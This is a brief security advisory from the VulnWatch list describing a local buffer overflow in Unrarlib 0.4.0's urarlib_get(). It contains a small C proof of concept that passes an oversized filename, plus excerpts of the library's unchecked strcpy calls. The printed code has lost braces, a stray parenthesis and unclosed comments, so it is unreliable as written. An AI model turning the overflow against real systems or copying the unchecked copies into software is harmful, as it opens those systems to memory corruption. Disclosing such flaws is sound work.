[VulnWatch] Unrarlib 0.4.0 (urarlib_get) Local buffer overflow


in file unrarlib.c don't exist the check control of size len filename
passed in function urarlib_get()


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unrarlib.h>

int main()
char *data_ptr;
unsigned long data_size;
char *ovf;

ovf = (char *) malloc(262);
memset(ovf, 'A', 260);

urarlib_get(&data_ptr, &data_size, ovf,
"test", "password"))

// get overflow

Source error:

char ArcName[255]; /* RAR archive
int urarlib_get(void *output,
unsigned long *size,
char *filename,
void *rarfile,
char *libpassword)
/* Get a file from a RAR file to the "output" buffer. The UniquE RAR
* does everything from allocating memory, decrypting and unpacking the
* from the archive. TRUE is returned if the file could be successfully
* extracted, else a FALSE indicates a failure.
BOOL retcode = FALSE;

#ifdef _DEBUG_LOG
int str_offs; /* used for debug-strings
char DebugMsg[500]; /* used to compose debug msg

debug_log_first_start=FALSE; /* only create a new log
file */
debug_init(_DEBUG_LOG_FILE); /* on startup


InitCRC(); /* init some vars

strcpy(ArgName, filename); /* set file(s) to extract
MemRARFile = rarfile; /* set pointer to mem-RAR
file */
strcpy(ArcName, rarfile); /* set RAR file name

-- starcadi

Relevant Pages